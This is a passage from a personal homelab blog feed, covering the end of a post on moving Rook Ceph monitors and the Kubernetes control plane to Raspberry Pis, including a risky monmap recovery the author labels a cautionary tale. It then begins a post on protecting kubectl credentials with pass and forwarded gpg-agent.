[...]/src/mon/MonMap.h: 221: FAILED ceph_assert(addr_mons.count(a) == 0)
</code></pre><p>Luckily for me, the operator checks the quorum before removing too many MONs,
and so the cluster was not broken. I fixed this by going back to my original
config, with three MONs placed on the three old control plane nodes. This
still did not bring back the cluster, still showing the above error. I fixed
this by editing the <code>rook-ceph-mon-endpoints</code> ConfigMap in the cluster namespace.
Its <code>data</code> key looks something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>: <span style="color:#ae81ff">m=300.300.300.1:6789,k=300.300.300.2:6789,l=300.300.300.3:6789,n=300.300.300.4:6789,o=300.300.300.5:6789</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">mapping</span>: <span style="color:#e6db74">&#39;{&#34;node&#34;:{&#34;k&#34;:{&#34;Name&#34;:&#34;oldcp1&#34;,&#34;Hostname&#34;:&#34;oldcp1&#34;,&#34;Address&#34;:&#34;300.300.300.1&#34;},&#34;l&#34;:{&#34;Name&#34;:&#34;oldcp2&#34;,&#34;Hostname&#34;:&#34;oldcp2&#34;,&#34;Address&#34;:&#34;300.300.300.2&#34;},&#34;m&#34;:{&#34;Name&#34;:&#34;oldcp3&#34;,&#34;Hostname&#34;:&#34;oldcp3&#34;,&#34;Address&#34;:&#34;300.300.300.3&#34;},&#34;n&#34;:{&#34;Name&#34;:&#34;newcp1&#34;,&#34;Hostname&#34;:&#34;newcp1&#34;,&#34;Address&#34;:&#34;300.300.300.4&#34;},&#34;o&#34;:{&#34;Name&#34;:&#34;newcp2&#34;,&#34;Hostname&#34;:&#34;newcp1&#34;,&#34;Address&#34;:&#34;300.300.300.5&#34;}}}&#39;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">maxMonId</span>: <span style="color:#e6db74">&#34;12&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">outOfQuorum</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span></code></pre></div><p>This still had the new MONs in there, which did not work. After manually removing
the entries for the MONs <code>n</code> and <code>o</code>, which were the new ones and restarting the
operator, everything came up fine again with the original three MONs on the old
nodes.</p>
<p>So onto attempt no. 2. Here I decided to go all in and immediately add all three
new nodes, instead of just two. That was because I realized that I could replace
all three MON addresses in the hardcoded netboot configs right away with the
new MONs if I just went straight to six MONs, the three old and three new ones.
This would save me one reboot for all netbooting cluster nodes.</p>
<p>So then I configured six MONs, and instead of replacing MONs in the placement
config, I just added the three new ones, so it now looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">cephClusterSpec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">mon</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">count</span>: <span style="color:#ae81ff">3</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">placement</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mon</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">nodeAffinity</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">requiredDuringSchedulingIgnoredDuringExecution</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">nodeSelectorTerms</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;controller&#34;</span>
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;kubernetes.io/hostname&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;oldcp1&#34;</span>
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;oldcp2&#34;</span>
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;oldcp3&#34;</span>
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;newcp1&#34;</span>
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;newcp2&#34;</span>
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;newcp3&#34;</span>
</span></span></code></pre></div><p>Applying this change worked without any issue whatsoever. The controller started
three new MON deployments, and they all came up without any problem.</p>
<p>I then changed the hardcoded MON IPs everywhere to the IPs of the three new
control plane nodes, and then rebooted the entire Homelab. Worked like a charm.</p>
<p>After that, the only thing remaining was to remove the old MONs. And here is
where the horror really started. I can&rsquo;t really put together what I did to create
this situation, so take the following paragraphs with a grain of salt. I hope
you can appreciate that I had other priorities than making good notes.</p>
<p>So I tried to get back to three MONs, but now running on the Pi 4 controller
nodes by going back to three MONs in the config and removing the three <code>oldcp</code>
nodes from the <code>nodeSelector</code>.</p>
<p>This seemed to lead the operator into an endless loop, because for some reason
it tried to stop one of the MON deployments on the new control plane nodes,
even though those were not supposed to be removed.</p>
<p>And here, I made my mistake. I got impatient, and manually deleted the
k8s Deployments of the MONs I no longer needed. Or thought I no longer needed.
And when that did not really help, I edited the MON map ConfigMap again and
manually deleted the old MONs there as well.</p>
<p>The price for my impatience immediately showed up in the operator logs:</p>
<pre tabindex="0"><code>ceph-object-store-user-controller: CephCluster \&#34;k8s-rook\&#34; found but skipping reconcile since ceph health is &amp;{Health:HEALTH_ERR Details:map[error:{Severity:Urgent Message:failed to get status. . timed out: exit status 1}] [...]}
</code></pre><p>The operator&rsquo;s attempts to even just get the cluster status timed out. I
confirmed that by trying to run <code>ceph -s</code>, to no avail. There were still three
MONs running. But no quorum anymore. I had just nuked my storage cluster.</p>
<p>Or so I thought. Looking at the logs of the still running MONs, I saw this line:</p>
<pre tabindex="0"><code>e15 handle_auth_request failed to assign global_id
</code></pre><p>For some reason I can&rsquo;t explain, I thought this might have to do with the old
MONs still being configured somewhere. Searching the web did not really deliver
any results. But I ended up on <a href="https://docs.ceph.com/en/latest/rados/troubleshooting/troubleshooting-mon/">this Ceph docs page</a>.
It showed me a way to get the MON map when the Ceph client doesn&rsquo;t work anymore:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl exec -it -n rook-cluster rook-ceph-mon-n-f498b8448-dw55m -- bash
</span></span><span style="display:flex;"><span>ceph-conf --name mon.n --show-config-value admin_socket
</span></span><span style="display:flex;"><span>/var/run/ceph/ceph-mon.n.asok
</span></span></code></pre></div><p>With that information, I could dump the MON status info:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph --admin-daemon /var/run/ceph/ceph-mon.k.asok mon_status
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#e6db74">&#34;mons&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> [
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;k&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.1:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;public_addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.1:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;l&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.2:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;public_addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.2:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;m&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.3:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;public_addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.3:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;n&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.4:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;public_addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.4:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;o&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.5:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;public_addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.5:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;p&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.6:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;public_addr&#34;</span>: <span style="color:#e6db74">&#34;300.300.300.6:6789/0&#34;</span>,
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>]
</span></span></code></pre></div><p>I&rsquo;ve removed a lot of additional information here, but the important part was:
Yes, the old MONs were still in the MON map. So how about updating the map so
it only contains the new MONs? Worth a try!</p>
<p>To do that, I needed to extract the actual MON map, in the correct format.
But that&rsquo;s, for some reason, only possible when the MON is stopped. But because
we&rsquo;re talking about Pods here, and not baremetal deployments, I couldn&rsquo;t just
stop a daemon and still access its data. So I ran the extraction anyway and looked closer at the error message:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph-mon -i n --extract-monmap /tmp/monmap
</span></span><span style="display:flex;"><span>2025-04-12T19:41:05.220+0000 ffffac4a5040 -1 rocksdb: IO error: While lock file: /var/lib/ceph/mon/ceph-n/store.db/LOCK: Resource temporarily unavailable
</span></span><span style="display:flex;"><span>2025-04-12T19:41:05.220+0000 ffffac4a5040 -1 error opening mon data directory at <span style="color:#e6db74">&#39;/var/lib/ceph/mon/ceph-n&#39;</span>: <span style="color:#f92672">(</span>22<span style="color:#f92672">)</span> Invalid argument
</span></span></code></pre></div><p>So, I thought: How much worse could it possibly get? And manually removed <code>/var/lib/ceph/mon/ceph-n/store.db/LOCK</code>.
The MON didn&rsquo;t seem to care and continued running, but now I had the MON map.</p>
<p>As I noted above: This is a cautionary tale. Not a how-to.</p>
<p>After I had the MON map, I needed to remove the three old MONs. For that, I was
able to use the <a href="https://docs.ceph.com/en/quincy/man/8/monmaptool/">monmaptool</a>:</p>
<pre tabindex="0"><code>monmaptool --rm k /tmp/monmap
monmaptool --rm l /tmp/monmap
monmaptool --rm m /tmp/monmap
</code></pre><p>And then I just needed to inject the MON map again, which I could do while the
MON was running:</p>
<pre tabindex="0"><code>ceph-mon -i n --inject-monmap /tmp/monmap
</code></pre><p>And then, after a restart of this utterly frankenstein&rsquo;ed MON&hellip;it came back up.
And it didn&rsquo;t throw the auth error anymore. And then one of the other running
MONs also came up again. And then the state check errors stopped in the operator
logs. And my <code>ceph -s</code> worked again. Much rejoicing was had. So much rejoicing.</p>
<p>I deleted the deployment of the last MON, as it wasn&rsquo;t willing to come up again.
And then the operator redeployed it, and it came up fine again.</p>
<p>Then I retreated to my fainting couch and contemplated my own hubris, stupidity
and especially impatience.</p>
<p>But it was done. Ceph being the battle-tested piece of software it is, there was
zero issue afterwards. The OSDs stayed happy almost the entire time and didn&rsquo;t
even need a restart.</p>
<p>If we could bottle the elation and relief I felt when the first MON started
spewing its comfortably familiar log outputs again, we would have one hell of
a drug on our hands. Bottled euphoria, pretty much.</p>
<p>Restoring it all from a blank Ceph cluster would have been a hell of a lot of work.</p>
<h2 id="stability-problems">Stability problems</h2>
<p>So I now had my control plane running on three Raspberry Pi 4 4GB. I had tried
to make sure that those Pis would have enough resources by giving the VMs that
ran the control plane before only four cores and 4GB of RAM, to keep them at
least somewhat close to the Pis.</p>
<p>But that did not give me a realistic estimate on whether the Pis would be able
to run the control plane. On the morning after I had finished the migration,
I woke up to two of my Vault Pods requiring unsealing because they were restarted.
After some searching, I thought I had found the culprit with these error messages:</p>
<pre tabindex="0"><code>2025-04-13 10:16:28.000 &#34;This node is becoming a follower within the cluster&#34;
2025-04-13 10:16:28.000 &#34;lost leadership, restarting kube-vip&#34;
2025-04-13 10:16:27.372 &#34;1 leaderelection.go:285] failed to renew lease kube-system/plndr-cp-lock: timed out waiting for the condition
2025-04-13 10:16:27.371 &#34;1 leaderelection.go:332] error retrieving resource lock kube-system/plndr-cp-lock: Get \&#34;https://kubernetes:6443/apis/coordination.k8s.io/v1/namespaces/kube-system/leases/plndr-cp-lock?timeout=10s\&#34;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)&#34;
</code></pre><p>After some checking I realized that, for some reason, my Ansible playbook hadn&rsquo;t
deployed kube-vip to two of my three Pi control plane nodes.</p>
<p>But that, sadly, wasn&rsquo;t the real issue. In the following days, I regularly came
home to find one or more of my Vault Pods having been restarted during the night.</p>
<p>After some intense log reading, I think I identified the problem: Very regular
timeouts in etcd. That&rsquo;s Kubernetes&rsquo; distributed database, holding the cluster&rsquo;s
state. I very regularly get spurious leader elections where the three nodes
can&rsquo;t even agree on what term it is. That then ultimately leads to timed out
requests from the kube-apiserver and restarts of kube-apiserver, kube-controller-manager
and kube-scheduler. This isn&rsquo;t really that bad - they seem to be perfectly able
to come up again. But still.</p>
<p>It&rsquo;s also not a permanent situation. Yesterday, for example, I didn&rsquo;t have any
spurious restarts on any host for over 31 hours.
Here&rsquo;s an example of kube-apiserver complaining:</p>
<pre tabindex="0"><code>2025-04-17 11:18:28.292 status.go:71] apiserver received an error that is not an metav1.Status: &amp;errors.errorString{s:\&#34;http: Handler timeout\&#34;}: http: Handler timeout
2025-04-17 11:18:28.292 writers.go:122] apiserver was unable to write a JSON response: http: Handler timeout
2025-04-17 11:18:28.291 status.go:71] apiserver received an error that is not an metav1.Status: context.deadlineExceededError{}: context deadline exceeded
</code></pre><p>And then there&rsquo;s etcd:</p>
<pre tabindex="0"><code>2025-04-17 11:18:30.903	slow fdatasync took=1.59687293s expected-duration=1s
2025-04-17 11:18:30.771	request stats start time=2025-04-17T09:18:28.771395Z time spent=2.000537375s remote=127.0.0.1:58000 response type=/etcdserverpb.KV/Range request count=0 request size=18 response count=0 response size=0 request content=&#34;key:\&#34;/registry/health\&#34;&#34;
2025-04-17 11:18:30.771	duration=2.000309284s start=2025-04-17T09:18:28.771470Z end=2025-04-17T09:18:30.771780Z steps=&#34;[\&#34;trace[1219274112] &#39;agreement among raft nodes before linearized reading&#39;  (duration: 2.00005686s)\&#34;]&#34; step_count=1
2025-04-17 11:18:30.771	apply request took too long took=2.000065119s expected-duration=100ms prefix=&#34;read-only range &#34; request=&#34;key:\&#34;/registry/health\&#34; &#34; response= error=&#34;context canceled&#34;
2025-04-17 11:18:29.154	timed out sending read state timeout=1s
2025-04-17 11:18:28.750	request stats start time=2025-04-17T09:18:26.749079Z time spent=2.000959149s remote=127.0.0.1:57984 response type=/etcdserverpb.KV/Range request count=0 request size=18 response count=0 response size=0 request content=&#34;key:\&#34;/registry/health\&#34; &#34;
2025-04-17 11:18:28.749	duration=2.000699837s start=2025-04-17T09:18:26.749169Z end=2025-04-17T09:18:28.749869Z steps=&#34;[\&#34;trace[1722676343] &#39;agreement among raft nodes before linearized reading&#39;  (duration: 2.00044495s)\&#34;]&#34; step_count=1
2025-04-17 11:18:28.749	apply request took too long took=2.000456339s expected-duration=100ms prefix=&#34;read-only range &#34; request=&#34;key:\&#34;/registry/health\&#34; &#34; response= error=&#34;context canceled&#34;
</code></pre><p>One really weird thing to note: the issues always seem to come at xx:18. The hour
at which they happen varies, but it&rsquo;s always around 18 minutes past the hour.</p>
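<p>Something that periodic smells like a scheduled job, so one thing worth checking
on the control plane nodes is whether any cron job or systemd timer happens to fire
around that time:</p>
<pre tabindex="0"><code>systemctl list-timers --all
crontab -l
</code></pre>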
<p>Just to illustrate how bad it sometimes gets, here are two attempts at getting
node agreement before linearized reads, taking 18 and 19 seconds:</p>
<pre tabindex="0"><code>2025-04-17 11:18:32.278 duration=19.273386011s start=2025-04-17T09:18:13.004696Z end=2025-04-17T09:18:32.278082Z steps=&#34;[\&#34;trace[416778461] &#39;agreement among raft nodes before linearized reading&#39;  (duration: 19.242077797s)\&#34;]&#34; step_count=1
2025-04-17 11:18:32.278 duration=18.583085717s start=2025-04-17T09:18:13.694856Z end=2025-04-17T09:18:32.277941Z steps=&#34;[\&#34;trace[434574392] &#39;agreement among raft nodes before linearized reading&#39;  (duration: 18.548892027s)\&#34;]&#34; step_count=1
</code></pre><p>On the positive side: The cluster itself didn&rsquo;t really seem fazed by the restarts.
It just trucked along. The only reason I had a problem with Vault at all is that
I like to keep the unseal key only in my password manager, not anywhere it would
be automatically accessible.</p>
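<p>So whenever that happens, unsealing is a manual affair. Roughly, assuming the
Pods are called <code>vault-0</code> and so on and live in a <code>vault</code> namespace, it looks
like this for each restarted Pod:</p>
<pre tabindex="0"><code>kubectl exec -it -n vault vault-0 -- vault status
kubectl exec -it -n vault vault-0 -- vault operator unseal
</code></pre>
<p>The first command shows whether the Pod is sealed, the second prompts for the
unseal key, which I then paste in from my password manager.</p>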
<p>But this is obviously not a permanent state. I have already found that running
<code>journalctl -ef</code> on one of the controller nodes pretty reliably brings down
at least one of the kube components. Updating a more complex Helm chart like
<a href="https://github.com/prometheus-community/helm-charts/tree/main/charts/kube-prometheus-stack">kube-prometheus-stack</a>
also does the trick pretty reliably.</p>
<p>For once, I&rsquo;m decidedly not looking forward to the service updates I&rsquo;ve got
scheduled for tomorrow morning. Let&rsquo;s see how that goes.</p>
<p>But the remediation has already been put into action: I&rsquo;ve ordered three
Raspberry Pi 5 8GB plus 500 GB NVMe SSDs and NVMe HATs for the Pis. I&rsquo;m assuming
that those will cope a hell of a lot better with the I/O load and tight latency
tolerances of the Kubernetes control plane.</p>
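<p>Once they arrive, I can also verify that assumption. etcd&rsquo;s own guidance is that
the 99th percentile fdatasync latency on its data disk should stay below roughly
10ms. A fio run like the following, with parameters along the lines of the usual
etcd disk benchmarking write-ups (so treat the exact numbers as a starting point,
not gospel), should show whether the NVMe drives get there. It assumes the default
etcd data directory under <code>/var/lib/etcd</code>:</p>
<pre tabindex="0"><code># run on the disk that holds the etcd data dir
mkdir -p /var/lib/etcd/fio-test
fio --rw=write --ioengine=sync --fdatasync=1 --directory=/var/lib/etcd/fio-test --size=22m --bs=2300 --name=etcd-disk-check
rm -rf /var/lib/etcd/fio-test
</code></pre>
<p>The interesting part of the output is the fdatasync percentile section.</p>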
<h2 id="final-thoughts">Final thoughts</h2>
<p>On Saturday night, after I had taken down the server which provided me with
some additional capacity during the migration, I felt most excellent. I was
starting to consider which Homelab project I would tackle next. There are so
many to choose from. I was rather disappointed when I was greeted by the downed
Vault Pods on Sunday morning.</p>
<p>But not to whine too much - this gave me an excellent reason to get started on
the Pi 5. Plus I also bought a 16 GB Pi 5 and a 1TB SSD. Those will serve me
well for some future ideas I&rsquo;ve got.</p>
<p>Plus, even though it&rsquo;s currently a bit unstable: I&rsquo;m done. &#x1f973;
The migration is done. I&rsquo;m now the proud owner of a Kubernetes cluster.</p>
<p>There is one more post to come in this series,
with my final thoughts and stats on the migration. But first, I want to migrate
the CP nodes to the Pi 5. But before that, I definitely want to upgrade the OS
in the Homelab from Ubuntu 22.04 to 24.04, because that&rsquo;s the first one with Pi 5
support, and I don&rsquo;t want to have multiple Ubuntu versions in the Homelab.</p>
<p>Now please excuse me while I go sharpen my Yak shaver.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Securing K8s Credentials</title>
      <link>https://blog.mei-home.net/posts/securing-k8s-credentials/</link>
      <pubDate>Mon, 07 Apr 2025 23:50:43 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/securing-k8s-credentials/</guid>
      <description>Using pass and gpg-agent to secure kubectl access credentials</description>
      <content:encoded><![CDATA[<p>Wherein I will explain how to use pass and GnuPG to secure k8s credentials.</p>
<p>Since I migrated my <a href="https://www.vaultproject.io/">HashiCorp Vault</a> instance
into my Kubernetes cluster, I started to feel a bit uncomfortable with the
Kubernetes access credentials just sitting in the <code>~/.kube/config</code> file in
plain text. Anyone who somehow gets access to my Command &amp; Control host would
be able to access them and do whatever they like with the Kubernetes cluster,
including the Vault deployment containing a lot of my secrets.</p>
<p>So I asked around on the Fediverse, and <a href="https://microblog.shivering-isles.com/@sheogorath">Sheogorath@shivering-isles.com</a>
came back with two interesting blog posts. <a href="https://shivering-isles.com/2024/11/kubernetes-oidc-keycloak">The first one</a>,
using OIDC, looked promising, but it would require some additional infrastructure
that would need to be up whenever I wanted to do something in Kubernetes. Which
would have also meant that I couldn&rsquo;t run that infrastructure in Kubernetes
itself.</p>
<p>But the <a href="https://shivering-isles.com/2022/03/store-kubernetes-credentials-pass">second post</a>
was very interesting, showing how to use <a href="https://www.passwordstore.org/">pass</a>
to store the k8s credentials.</p>
<p>I&rsquo;m already using pass as my password manager on my desktop and phone, so this
sounded like an excellent idea.</p>
<p>In short, pass is a pretty simple bash script which uses <a href="https://gnupg.org/">GnuPG</a>
to encrypt and decrypt files containing passwords, or really any data at all,
sitting in my home directory. The initial setup is a little bit
more involved due to needing GnuPG keys, but afterwards it&rsquo;s pretty easy to
use. Its main interface is the command line, where you can enter new passwords,
show existing ones and move them around.
But there&rsquo;s also an Android app and a Firefox browser extension which both
work very nicely.</p>
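<p>Day-to-day usage is about as simple as it gets. A few illustrative commands, with
made-up entry names:</p>
<pre tabindex="0"><code>pass insert websites/example.com   # prompts for a password and stores it encrypted
pass show websites/example.com     # decrypts and prints it
pass ls                            # shows the tree of stored entries
</code></pre>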
<p>There was only one problem: I didn&rsquo;t want to set up a whole different set of
GnuPG keys to use on my Command &amp; Control host. After some searching, I figured
out that <a href="https://www.gnupg.org/documentation/manuals/gnupg/Invoking-GPG_002dAGENT.html">gpg-agent</a>
has some forwarding options, similar to ssh-agent. And I already had gpg-agent
running on my desktop.</p>
<p>Using a remote gpg-agent for access to the secret key has an additional
advantage: Even if an attacker can get into my Command &amp; Control server, the
key necessary to decrypt the Kubernetes credentials is not physically present
on the machine. One more hurdle for an attacker to overcome.</p>
<h2 id="setting-up-gnupg-on-the-command--control-machine">Setting up GnuPG on the Command &amp; Control machine</h2>
<p>The first thing to do is to import the public half of the key pair that pass
will later use to encrypt the Kubernetes credentials.
Note that only the public key is needed here - the private key stays on the
original machine, in my case my desktop computer.</p>
<p>First, list the keys on the original host:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>gpg --list-public-keys
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>pub   rsa4096 2022-06-23 <span style="color:#f92672">[</span>SC<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>      3BBC8F8D9E7CB515338C6F0B34BBBD3D676F000F
</span></span><span style="display:flex;"><span>uid        <span style="color:#f92672">[</span> ultimate <span style="color:#f92672">]</span> Foo Bar &lt;mail@example.com&gt;
</span></span><span style="display:flex;"><span>uid        <span style="color:#f92672">[</span> ultimate <span style="color:#f92672">]</span> Baz Bar <span style="color:#f92672">(</span>Private<span style="color:#f92672">)</span> &lt;mail2@example.com&gt;
</span></span><span style="display:flex;"><span>sub   rsa4096 2022-06-23 <span style="color:#f92672">[</span>E<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span></code></pre></div><p>In this output, the important part is the keyhash in the line after the <code>pub</code>
line: <code>3BBC8F8D9E7CB515338C6F0B34BBBD3D676F000F</code>.
That&rsquo;s the identifier for the key.</p>
<p>Next, I needed to transfer the public key over to my Command &amp; Control host:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>gpg --export 3BBC8F8D9E7CB515338C6F0B34BBBD3D676F000F | ssh myuser@candchost gpg --import
</span></span></code></pre></div><p>With that done, I could go ahead and set up the GnuPG agent forwarding. I followed
<a href="https://wiki.gnupg.org/AgentForwarding">this documentation</a> and did not have
any issues.</p>
<p>In short, I added these lines to the SSHD server configuration on the <code>candchost</code>:</p>
<pre tabindex="0"><code>Match User myuser
  StreamLocalBindUnlink yes
</code></pre><p>In addition, I also had to add these lines to my own SSH config for my user on
my desktop from where I&rsquo;m accessing the Command &amp; Control host, at <code>~/.ssh/config</code>:</p>
<pre tabindex="0"><code>Host candchost
  RemoteForward  /run/user/1000/gnupg/S.gpg-agent /run/user/1000/gnupg/S.gpg-agent.extra
</code></pre><p>As the documentation notes, the following commands can be used to find the right
socket paths. For the second path in the <code>RemoteForward</code> option, which is the
local (on my desktop) gpg-agent &ldquo;extra&rdquo; socket:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>gpgconf --list-dir agent-extra-socket
</span></span></code></pre></div><p>And then to get the socket on the <code>candchost</code>, for the first argument of <code>RemoteForward</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>gpgconf --list-dir agent-socket
</span></span></code></pre></div><p>This is just the path of the standard GnuPG socket on that host.</p>
<p>And that&rsquo;s all there was to it. When I reconnected to the <code>candchost</code> via SSH, I
was able to use gpg-agent and got access to my remote agent on my desktop.</p>
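<p>A quick sanity check to convince yourself that the forwarding really works is a
round trip through the imported public key on the <code>candchost</code>. The
<code>--trust-model always</code> is only there because the key hasn&rsquo;t been marked as
trusted yet at this point:</p>
<pre tabindex="0"><code>echo test | gpg --trust-model always --encrypt --recipient 3BBC8F8D9E7CB515338C6F0B34BBBD3D676F000F | gpg --decrypt
</code></pre>
<p>If the pinentry prompt shows up on the desktop and the word <code>test</code> comes back out,
the private key is being used through the forwarded socket.</p>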
<p>One last thing to do was to trust the public key transferred to the <code>candchost</code>.
This is only possible after the forwarding has been configured, because I didn&rsquo;t
have, and don&rsquo;t need, a private key to do any trusting with on the <code>candchost</code>.</p>
<p>Trusting a key works like this:</p>
<pre tabindex="0"><code>gpg --edit-key 3BBC8F8D9E7CB515338C6F0B34BBBD3D676F000F
Secret key is available.

[...]

gpg&gt; trust
[...]

Please decide how far you trust this user to correctly verify other users&#39; keys
(by looking at passports, checking fingerprints from different sources, etc.)

  1 = I don&#39;t know or won&#39;t say
  2 = I do NOT trust
  3 = I trust marginally
  4 = I trust fully
  5 = I trust ultimately
  m = back to the main menu

Your decision? 5
Do you really want to set this key to ultimate trust? (y/N) y

[...]
Please note that the shown key validity is not necessarily correct
unless you restart the program.

gpg&gt; q
</code></pre><p>This procedure uses the private key from the gpg-agent, meaning the key from
my desktop system, which was a nice confirmation that the forwarding setup
worked.</p>
<h2 id="setup-pass">Setup pass</h2>
<p>The next step is to setup pass. First, install it:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>apt install --no-install-recommends --no-install-suggests pass
</span></span></code></pre></div><p>The <code>--no-install-suggests</code> and <code>--no-install-recommends</code> flags are very much
